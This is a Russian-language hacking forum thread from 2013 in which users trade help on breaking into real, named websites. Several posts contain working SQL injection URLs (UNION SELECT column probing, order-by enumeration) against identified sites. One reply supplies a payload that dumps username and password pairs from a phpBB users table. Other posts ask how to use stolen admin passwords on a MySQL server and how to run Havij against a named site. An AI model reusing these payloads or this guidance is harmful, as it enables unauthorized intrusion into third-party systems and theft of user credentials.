HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22681  
Старый 21.08.2013, 00:35
ishenko
Guest
Сообщений: n/a
Провел на форуме:
705

Репутация: 0
По умолчанию

Приветствую всех.

При запросе site.ru:3306 скачивается файл а в нем версия мускуля

F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F  яBad handshake

настройки мускула неправильные?

дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...

проверка по айпи может?

или еще как нить блокирует ?
 
Ответить с цитированием

  #22682  
Старый 21.08.2013, 00:45
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию

Цитата:
Сообщение от ishenko  
ishenko said:
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?
Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.
 
Ответить с цитированием

  #22683  
Старый 21.08.2013, 12:45
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Я уже задолбался подбирать столбцы

Код:
Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так
 
Ответить с цитированием

  #22684  
Старый 21.08.2013, 22:29
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Я уже задолбался подбирать столбцы
Код:
Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27
народ, скажите что не так
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"

http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
 
Ответить с цитированием

  #22685  
Старый 22.08.2013, 12:44
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от Ravenous  
Ravenous said:
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1
Разочарование при вводе version() - I don't like you...
 
Ответить с цитированием

  #22686  
Старый 22.08.2013, 13:12
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version
 
Ответить с цитированием

  #22687  
Старый 23.08.2013, 11:55
danil7493
Guest
Сообщений: n/a
Провел на форуме:
6848

Репутация: 10
По умолчанию

Скажите что не так?

http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
 
Ответить с цитированием

  #22688  
Старый 23.08.2013, 14:28
migjee
Новичок
Регистрация: 13.06.2008
Сообщений: 1
Провел на форуме:
8301

Репутация: 0
По умолчанию

Нашел единственную уязвимость на сайте.Начал анализ

Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?
 
Ответить с цитированием

  #22689  
Старый 23.08.2013, 14:52
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
Отправить сообщение для RedX с помощью ICQ
По умолчанию

Цитата:
Сообщение от danil7493  
danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy
Код HTML:
HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1
 
Ответить с цитированием

  #22690  
Старый 23.08.2013, 15:06
migjee
Новичок
Регистрация: 13.06.2008
Сообщений: 1
Провел на форуме:
8301

Репутация: 0
По умолчанию

Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал

вот тут уязвимость

http://rp-gameworld.ru/index.php?c=registration&action=reg
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ